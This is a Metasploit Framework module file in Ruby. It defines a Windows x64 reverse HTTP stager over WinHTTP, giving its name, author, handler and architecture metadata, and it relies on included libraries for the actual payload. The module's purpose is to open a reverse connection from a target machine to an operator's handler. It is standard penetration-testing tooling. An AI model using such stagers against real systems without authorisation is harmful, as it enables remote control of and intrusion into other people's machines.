##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

module MetasploitModule
  CachedSize = 718
  CachedSizeOverrides = {"windows/x64/custom/reverse_winhttp" => 734}

  include Msf::Payload::Stager
  include Msf::Payload::Windows
  include Msf::Payload::Windows::ReverseWinHttp_x64

  def self.handler_type_alias
    'reverse_winhttp'
  end

  def initialize(info = {})
    super(
      merge_info(
        info,
        'Name' => 'Windows x64 Reverse HTTP Stager (winhttp)',
        'Description' => 'Tunnel communication over HTTP (Windows x64 winhttp)',
        'Author' => [ 'OJ Reeves' ],
        'License' => MSF_LICENSE,
        'Platform' => 'win',
        'Arch' => ARCH_X64,
        'Handler' => Msf::Handler::ReverseHttp,
        'Convention' => 'sockrdi http',
        'Stager' => { 'Payload' => '' }
      )
    )
  end
end
